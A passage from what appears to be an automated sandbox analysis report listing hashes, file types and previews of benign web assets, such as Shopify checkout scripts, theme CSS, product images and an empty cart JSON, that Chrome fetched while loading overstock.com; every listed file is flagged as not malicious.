                                                                                                                                                          SHA-512:E7A6F9F0B7B2DDCB05F0622E82C5B6681865E71C38A6BD155DEB7D9F70103723988A66AAC8806B3C9064AA2DC449B9C6FE78093BD33121BDC406F21AD893E07C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useGooglePaySdk.DGK5p3VT.js
                                                                                                                                                          Preview:import{c6 as fe,gE as b,gF as Ie,gG as Re,gH as Q,gI as ve,gJ as be,b3 as Ne,gK as De,gL as Oe,gM as Ce,e as q,T as N,r as Te,g0 as T,g1 as G,fg as te,gN as Ge,dx as z,g2 as we,gO as Me,z as w,gP as ne,gQ as Le,g9 as He,aN as O,aM as se,g8 as Ve,g6 as C,c8 as ke,gR as Ye,gd as Ue,q as R,ge as k,gS as ae,gT as oe,as as W,gU as xe,H as ie,gV as B,gW as F,gX as qe,gY as $,gZ as ze,g_ as Z,g$ as We,h0 as X,h1 as Be,h2 as Fe,h3 as $e,h4 as re,h5 as Ze,h6 as le,h7 as Je,h8 as je,h9 as Ke,ha as Qe,hb as Xe,ai as de,hc as et,Y as tt,gc as nt,hd as st,g7 as at,g3 as ot,A as it,he as rt,y as ee}from"./app.CRtF78CU.js";class Y extends Error{name="GooglePayGenericError"}class Ct extends Error{name="GooglePayCreateButtonError"}class lt extends Error{name="GooglePayDeveloperError"}class dt extends Error{name="GooglePayPaymentClientError"}class U extends Error{name="GooglePaySubmissionError"}function ce(){return fe().currency}const ct="https://pay.google.com/gp/p/js/pay.js",ut=2,pt=0,gt={apiVersion:u
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1613)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1709
                                                                                                                                                          Entropy (8bit):5.096864969851674
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0CD8D9A6179C8820DB20FE3B3393C795
                                                                                                                                                          SHA1:E5795B666D5A9F4E53D0C3D672745275D6C752B4
                                                                                                                                                          SHA-256:3B8185CCC6604F7DF2B062B44C8FC00047CEA844E9D37C71545F7A26A0B49653
                                                                                                                                                          SHA-512:DE70F615B7FAE943BE18B8652271591DD5D12A95DB53D8F184DE0A17CB737EF223360C3BD0BB1EEB74D3C0574D457A9227CE31E7FDB2CA5AE2885E4BD3D64ACA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/gallery.css?v=44986831446514692791729142870
                                                                                                                                                          Preview:.gallery-block--stacked:last-child .gallery-block__text{margin-bottom:0}.gallery-block .subheading:not(:last-child){margin-bottom:var(--space-unit)}.gallery{grid-auto-rows:-webkit-min-content;grid-auto-rows:min-content}.gallery.grid{gap:calc(3 * var(--space-unit))}.gallery .color-scheme--white{background:none}.gallery .color-scheme--default{background-color:rgba(var(--bg-color))}.gallery-block__image{flex-grow:1;padding:5%}.gallery-block__image-text,.gallery-block__promo-text{z-index:2;padding:5%}.gallery-block__image-text p:last-child,.gallery-block__promo-text p:last-child{margin-bottom:0}.gallery-block__image-text.text-overlay{max-width:400px;margin:0}.gallery-block__promo-text{display:flex;flex-direction:column;justify-content:center;border-radius:var(--overlay-border-radius, 0)}.gallery-block__promo-text--opaque{box-shadow:2px 2px 8px #212b363d}.gallery-block__image-text--transparent{padding:0}.gallery-block__promo-text--rounded{border-radius:50%;aspect-ratio:1/1}.gallery-block__t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1495)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1597
                                                                                                                                                          Entropy (8bit):5.009701441446708
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4B6B4AAAD5BC5CE1A78337BE2BF72C77
                                                                                                                                                          SHA1:C906F53A4DCFCAF8C6FAC119A6B40C45D6AE634C
                                                                                                                                                          SHA-256:ED1F6710A6DD0617B4E4167C06D5505A31C42AACC949DBE05969E01D76706B6A
                                                                                                                                                          SHA-512:33B139BC8D04229DB2F3BA13F3E86FD9BADECB7278D6F77F8D936B77F4FA7E2CC05E6F48DF4172F1341888E77A5515108EA0EF0F1450393C2E09FCE42965A305
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:if(document.body.classList.contains("cc-animate-enabled"))if("IntersectionObserver"in window&&"MutationObserver"in window){const initAnimateOnScroll=()=>{const animatableElems=document.querySelectorAll("[data-cc-animate]:not(.cc-animate-init)");if(animatableElems.length>0){const intersectionObserver=new IntersectionObserver((entries,observer)=>{entries.forEach(entry=>{entry.isIntersecting&&!entry.target.classList.contains("cc-animate-in")&&(entry.target.classList.add("cc-animate-in"),observer.unobserve(entry.target))})});animatableElems.forEach(elem=>{elem.dataset.ccAnimateDelay&&(elem.style.animationDelay=elem.dataset.ccAnimateDelay),elem.dataset.ccAnimateDuration&&(elem.style.animationDuration=elem.dataset.ccAnimateDuration),elem.dataset.ccAnimate&&elem.classList.add(elem.dataset.ccAnimate),elem.classList.add("cc-animate-init"),intersectionObserver.observe(elem)})}},aosMinWidth=getComputedStyle(document.documentElement).getPropertyValue("--aos-min-width")||"0",mq=window.matchMedia(`(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):40408
                                                                                                                                                          Entropy (8bit):7.985616686744594
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AB9D994244038B27628F9444097065D6
                                                                                                                                                          SHA1:F3C241A23581B6C2634E841B3556D15DC6AD9C4D
                                                                                                                                                          SHA-256:B935413EE2B49A7ED86123EF07F1E74659944387C24F713B5D4FCA01B2F23401
                                                                                                                                                          SHA-512:32688A9864581FB81C9DEACCA82BDD3CB1885BDA25B20887780D08B9FC632D1B46910B7ED63ED5C3C8C1A59B71601093ECBE3942F48D4701ED46CE0215039A96
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Handmade-Cape-Cod-Pepa-Coastal-Jute-Rug.jpg?v=1715133314&width=320
                                                                                                                                                          Preview:RIFF...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 @....S...*@.@.>9..B.!!..~. ....'...tG..H.O..C.o. |...YM./.?....~...g.w...?......................;.....'....t?...@|..F.9...'.g..s_.......~............o......q~..g..{........c....._.......'.?..7...?....!_N....?....../._............%.w._......1.....W.'.G.....b.....A...........C.k....P.N.........O.......~........O"...................../.W...W.O.?g.Q..._........._.................O......!.Z\h.x<.1.Z..ZO .k0.Uu.!.{z...X.q.t........*.#C..?..6.B.*...L.W...%x9.>y-m...0.6.3..1.@....B|R....s.%..T..N.s........9~../...[.n.@
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29852
                                                                                                                                                          Entropy (8bit):7.943195636160391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:13CA8CD3BCA692F5F292D1E1AF461374
                                                                                                                                                          SHA1:C9654BD64092FF8E7DEFD9FF801C9F39AF5C2C19
                                                                                                                                                          SHA-256:27D9EDC971394BF959DAC1073ADBB9617ACFC50361A7474033AB1F2A130A40F5
                                                                                                                                                          SHA-512:366BD1C31EA8F83A3DBA2D3812AB21188397DC4CC78F3E575CB01F03891AFC87FBE077670BECB5F9573A5DA0DBA3E899808B1ADD55BD17F781F207F7449F7C7E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................(....!...P ..................F..........&Re.G.(..8.\.g.&..Q.9... -ppp.......B...@@...Q.d..J[Xk..`0ppp....p..p.....p..8!.X9.........Q..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (789)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):894
                                                                                                                                                          Entropy (8bit):5.059265965352107
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:87B8217B4267587C2755069DB176B81C
                                                                                                                                                          SHA1:D05E4C65E789831580BBF331EB7860B1FA0BCEF6
                                                                                                                                                          SHA-256:2DA0E7E1661D9B960E7447C09C115E21477786991E50E152F10A893BBCE2A01B
                                                                                                                                                          SHA-512:21F6867E50D730790937C9F561297301E6EFC90DAEFCF9D68FC32ED1B2034D46CA053B0C2CCBDFBB318A189D8F82F121551F3A13C844132C2D13A012558E6119
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/icons-with-text.css?v=105357110638478380851729142870
                                                                                                                                                          Preview:.icons-with-text .carousel[inactive] .icons-with-text--narrow{max-width:600px;margin:0 auto}.icons-with-text .icon{flex-shrink:0}.icons-with-text .slider-nav{right:calc(-1 * var(--gutter));left:calc(-1 * var(--gutter))}.icons-with-text .slider-nav__btn{padding:0}.icons-with-text .slider__item{scroll-snap-align:end}.icons-with-text .slider--no-scrollbar .slider__grid{width:100%}.icons-with-text__text:not(.text-center){margin-inline-start:20px}.icons-with-text--narrow{max-width:600px;margin:0 auto}@media (max-width: 599.98px){.carousel[disable-mobile=true] .icons-with-text__text:not(.icons-with-text__text--icons-above){flex-basis:190px}.carousel[disable-mobile=true] .icons-with-text .icon{flex-basis:35px}}@media (min-width: 600px){.icons-with-text .slider-nav__btn{padding:0 10px}}./*# sourceMappingURL=/cdn/shop/t/211/assets/icons-with-text.css.map?v=105357110638478380851729142870 */.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21041
                                                                                                                                                          Entropy (8bit):7.905473807820412
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1FD2C2D9EE55DAA54A2F1831FF0C53B6
                                                                                                                                                          SHA1:F3162ACD82176C90A8D71D95602861F1D7878859
                                                                                                                                                          SHA-256:55F0EC4BEEAEFEE25F7A77A6DE97F07056756BB1E0DD7BB6EB1EC0A10C9F83B7
                                                                                                                                                          SHA-512:58EF3500D3757B76F3CF6EFC6FDC464A9AE389E83D4A14ECF95DE20B22ED70AE95ABE9AFBEE8CF00C6DE8C8F7F2E3FF64B7B1BD524378531893167A1229FAAFF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..................................................................................,........................................................................................................................J]P@.Ig.Q...H...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):102
                                                                                                                                                          Entropy (8bit):4.731372038840301
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F3DFE1A46E91C1C5521B4ED0E336AE06
                                                                                                                                                          SHA1:8112055ED07A442DD199C15A8B2C451A3E4B54E6
                                                                                                                                                          SHA-256:724FC56703E050F8625D033339E4C69746C05564BA34DF35003A34ED59432657
                                                                                                                                                          SHA-512:0570AADEDB1FFB2EAEB8A8454004C1EA63109712D07E9F0E1D08FDEEFA06FC8CD64C75688A2FE5AF7EE314E056BC744337FEFA8B5FDA95F17B2B0E4146D81C5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=aR-zv8WjtWx4lAw-tRCA-zca
                                                                                                                                                          Preview:importScripts('https://www.gstatic.com/recaptcha/releases/aR-zv8WjtWx4lAw-tRCA-zca/recaptcha__en.js');
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x650, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):111076
                                                                                                                                                          Entropy (8bit):7.9815500992778805
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A4A4BC5E8957287A64B8446D5ACBCB26
                                                                                                                                                          SHA1:E96D4818E781EF16D8C65A352E0F7FDE35E8687C
                                                                                                                                                          SHA-256:340DD035C624945D4BE94F5E16C79193706E65FA3C9D9931E460803CC06E5A01
                                                                                                                                                          SHA-512:94DB5F2A1C324ECD508913B448311038265DABF49579B3578DE55DDDDE76A7FB98AD19A6C55123C79286B596D0A34E5F42DD608F8EF844E0CA9400378AFE9A81
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}.........................................................................................................................................................$.":..@..&@..@.....G`..........#...A................................F>;.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):34542
                                                                                                                                                          Entropy (8bit):7.981279246998934
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0301D933FC5BADC819AC76D261242187
                                                                                                                                                          SHA1:64284EE5EFA21E8892CC94A97C62C236E1FD0291
                                                                                                                                                          SHA-256:2BC6302590BD9D17B63EE46A96DDAB1501EC63EE6CA23009723C0398C95861E1
                                                                                                                                                          SHA-512:DCA33481A2778D4FAE0C36EA1BA7818CF01A4C957F7F73C3B210D456EB4C9D0542643E8F2F96868AD2447BFE4FDE14889F82EC395A4C0187D1779B794D8E5D1F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10142024-MOPS-A3_Desktop.jpg?v=1728929398&width=650
                                                                                                                                                          Preview:RIFF...WEBPVP8X....(......m..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 V...0....*..n.>9..C.!..... ....q.....Rn.-d....}........3...?.?......................?....{.....~..p...K......?a>Y.n.U.G.......O............w...W.........J.C...w...c.g...>.?........G....?z.....-..{..s......./.W...........D......./...~....S.y.?............@?..............oz.>~....>_=......k..........c............/.....?..a...>.......7...7.w.n?.?......c.....~.............w.G.........~...................q.../.O.?P.....K...?..y.P...C.K.....7..............s......>.....LBW..M.2..uA+...&..yi.......i....PJ.r....^Zn.%|.@
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25056
                                                                                                                                                          Entropy (8bit):7.972917670075097
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:66AD9FB7530143B2DE8E4F24B1DA8790
                                                                                                                                                          SHA1:5C3C53960A3715C0DA57964B16699AAE2DBA5B75
                                                                                                                                                          SHA-256:D6D36A123487CDECC0F3F39D85B96BD6493C1EB1BC62CC334BD21B5970C7D485
                                                                                                                                                          SHA-512:1BB7945DAAE0EABF9C34CE972652807285CB6BFACB529F85ABE4D672D77702C5F32E42B5D6F6DECA36119807631F3D54A15198B0EBE42347AB71C435D2BEB111
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Amelia-Agda-Abstract-Rug_0d11647a-5375-4a3a-ae4b-989fe9680aaf.jpg?v=1728147937&width=320
                                                                                                                                                          Preview:RIFF.a..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 H_.......*@.@.>9..C"!...nH ....p..b.n....::y....j+.>.~........U.?.o....J...w}A~..../.I...W.'..P....=o.....E...s........j.._........W...........Z.=......4.#.....?......>............5.?.W.....'...w.G.....x.....\........w..h.w.......W.W....W....p..?....y...-...o....y.w.O.............?i~.?..........?......{...............{......o.....4B*...6.B...ES5....V.a..f....d.F..(./..}j..0.s..m..g(,.Xe?.....?...2v..._...2...w5R....H.....p.Mr@...}.s*m.,.9#x.:|.\...D.F.U...(.9.....<..... ..-.'E.P.c.Ad.>./.V.....m(..vBUk.~../....8.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9497
                                                                                                                                                          Entropy (8bit):3.803329550188562
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:871FBAB3856A9FCC30768C3B7ED875AF
                                                                                                                                                          SHA1:C9A6C3FB54704A4C5EBA36C40F9200DA83F7E2D7
                                                                                                                                                          SHA-256:D0917DF1FF1EE7072978E78DB5489CD7A3CFABF1EF201484CB4228BBAA222BB6
                                                                                                                                                          SHA-512:3955022DC365602DC133BDEA941DA8578E1099C9C349B1A05D45C0BD23836D4E349C1465332AEE87D266E867F12D8863ABF0D96609815BE81923BD6C906F6A0B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Group_570.svg?v=1719045744&width=194
                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 194 40" height="40" width="194">.<path fill="white" d="M34.2235 9.53755L25.5832 14.587V24.3493L16.9435 29.6229L8.6404 24.6858V34.3358L16.9435 39.2728L34.2235 29.2863V9.53755ZM17.2801 9.64993L25.5832 14.587V4.93705L17.2801 0L0.00012207 9.98648V29.7347L8.6404 24.6858L8.63982 14.9235L17.2801 9.64993Z" clip-rule="evenodd" fill-rule="evenodd"></path>.<path fill="white" d="M47.3635 19.8779C47.3635 20.8205 47.4682 21.7421 47.6777 22.6427C47.9081 23.5225 48.2642 24.3184 48.7459 25.0305C49.2276 25.7427 49.856 26.3187 50.631 26.7585C51.406 27.1774 52.3485 27.3869 53.4586 27.3869C54.5688 27.3869 55.5113 27.1774 56.2863 26.7585C57.0613 26.3187 57.6896 25.7427 58.1714 25.0305C58.6531 24.3184 58.9987 23.5225 59.2082 22.6427C59.4386 21.7421 59.5538 20.8205 59.5538 19.8779C59.5538 18.8935 59.4386 17.9405 59.2082 17.0189C58.9987 16.0973 58.6531 15.2804 58.1714 14.5683C57.6896 13.8352 57.0613 13.2592 56.2863 12.8402C55.5113 12.4004 54.5688
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):342
                                                                                                                                                          Entropy (8bit):5.365567192002376
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4C8E06FB7E738E6344B8516A0E69B823
                                                                                                                                                          SHA1:D16FC7059EDB4B35056E208E69AD02C592C364E7
                                                                                                                                                          SHA-256:1566D42D1B745845EBE7A5321388E054B39F18596A0AC9FDA31C50C0335CD897
                                                                                                                                                          SHA-512:912932DD4331E5C5C3370FECF0846223CE89754B12CBFB4EEB5B4121C63D1031D21655F070691AF5FCD01F68176FF2C81813C8033A674E67E77EE583681FBF59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"token":"Z2NwLXVzLWNlbnRyYWwxOjAxSkFHQUgxM1BGUzFUQzJaRFFTTUNLRlZK?key=51f85f73d0f4632eb27adbb17a753aa9","note":"","attributes":{},"original_total_price":0,"total_price":0,"total_discount":0,"total_weight":0.0,"item_count":0,"items":[],"requires_shipping":false,"currency":"USD","items_subtotal_price":0,"cart_level_discount_applications":[]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 564
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):331
                                                                                                                                                          Entropy (8bit):7.303388870408431
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:453337D17580029E1D3C01EF733E6338
                                                                                                                                                          SHA1:BBB505D93EE06D2AFBB124B63D5F41ADE88CECCD
                                                                                                                                                          SHA-256:6E331F5545E2973EAE34F1D076E2479A8D3681D766AEF6DE6B939B9C19B0172D
                                                                                                                                                          SHA-512:63115BCDE61A9BB77A443705346D69256369D071C6D503D3150899BFF0208F3533C93A6946EC8DC45DA638D4F667CC802D99CCC6A7C4E92921FCB718446863B0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:..........e.Oo.0..J...4q..n...H.nk...BikhD...!.w.3V..[..._|..>..f..J /G..\.:{0P.T.tP..T...P...`L_6......C..,...BGiC..?r.B.........+..V....>.u.h.....d{..K.".J..a......E.....6(......#.re.. .z........HS.do...:...rY..3j...s... I......8.....I.H...........C1M.t.xJ...d..%c1........j.D.>.{B{a...M.{..j&.q.qEX../ko494...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (9027)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9655
                                                                                                                                                          Entropy (8bit):5.386289417665662
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3959782A7EF3346BD84C0776655E0010
                                                                                                                                                          SHA1:C34E25E7032EA0A69B4A865B44C15787B69C0FE3
                                                                                                                                                          SHA-256:D282A82CBC9A6A099DB8F59886930525CA8424B9144E7998A4D2B9A20C4B5F6C
                                                                                                                                                          SHA-512:2B61CCA7F6EA74F09C663601C2A38F6647AAAEB50C099303415AF4F0CA7724E9973B3EAF51E89B156215220032CD2F21C14845013C6AF9D43AFDDF9BABD10664
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/PayButtonSection.6z826TXQ.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["ShopPayButtonContainer.DW6ispxC.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","context.Cu9sylBE.js","constants.CFmdgH0R.js","useUnauthenticatedErrorModal.gdEu53Hp.js","Section.DDmRJFSq.js","assets/Section.sQehCocD.css","OnePageModal.BVW5k1eZ.js","ShopPayLogo.D_tvM4Kt.js","assets/ShopPayLogo.D_HPU8Dh.css","Rollup.B3ludNL-.js","assets/Rollup.o9Mx-fKL.css","useShowShopPayOptin.fhQjPey-.js","RageClickCapture.BFDgLbCX.js","MarketsProDisclaimer.BZXsgf5w.js","assets/RageClickCapture.DnkQ4tsk.css","assets/ShopPayButtonContainer.B0ZxHYBW.css"])))=>i.map(i=>d[i]);.import{e as b,b7 as $,dx as ee,c1 as k,as as te,b0 as oe,dX as ne,bl as se,dP as R,a as o,a7 as E,e0 as re,aa as m,a9 as f,d$ as ae,ej as ie,ek as ce,el as ue,c as le,d as v,em as V,J as T,en as I,eo as de,ep as pe,eq as he,er as ye,es as Pe,et as me,y as g,eu as ge,ev as fe,ew as O,bA as W,ex as be,ey as Se,ez as ve,eA as _e,j as ke,bJ as Ce,bK as Ae,_ as Be,dA as Ee,aF as we
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):12264
                                                                                                                                                          Entropy (8bit):7.925971194499563
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BB2B88A11B12C1CABDB354765B4F54AD
                                                                                                                                                          SHA1:E0E70417D09263CA32CBAFE771DEDF847D3F6845
                                                                                                                                                          SHA-256:3D7238706732D9CD36BEE8D4CC11C0DC0570B48D19461B175D12ECBA20D4D7A5
                                                                                                                                                          SHA-512:955A3428D1BA22740D2A1EBA3531675E10892028EB19568E21706536DB48652B21C2466D95B88958B6B8B3C036A8A67D41D089D7AC80F6B949ACDBCEC942FF3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/POLYTRENDS-Laguna-Outdoor-Eco-Friendly-Poly-Folding-Adirondack-Chair-_28Set-of-2_29_846d5aa1-56c8-4818-b31a-2d4d7dbcb7c8.jpg?v=1728075182&width=320
                                                                                                                                                          Preview:RIFF./..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 P-..p....*@.@.>9..C.!..... ...7s.w.+S./.?,;.4.Z...+.....=qy...?f>YvW.e|....w......v.....?..._.O.......?.].1?`=..~............~........-.#........._.............../..h..?...>N?........7.#.........>......t...../2..xO..........?.5....o.o.].V..;.?....L.>@\-~.........-?W.........@..0..}.J.%@.........6H.w..J"]..8D...'.9>..g.\....J....%T.H}/..n.y.{y.mC.X....Z...wi...[..B..#WtR{.....R6.-.....0...r..i+..j..m.U.<<..Ybf.....f.....lJ...;.........A..N..N.I.va.n.__]...&....k.=.Z./tVS.t...@H..Q-.o....x..D..mh&.w...Ny..0d'.s/...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (2909)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3118
                                                                                                                                                          Entropy (8bit):5.098122639200933
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C97AC7DD2146D909788050EBA613C108
                                                                                                                                                          SHA1:5725DED5FCF5C4A12160B18619D7D627EC615C02
                                                                                                                                                          SHA-256:6DDAA87F19D10347717422CE856C36AF809262BDD1C276BA20AED7D3D66FC1B9
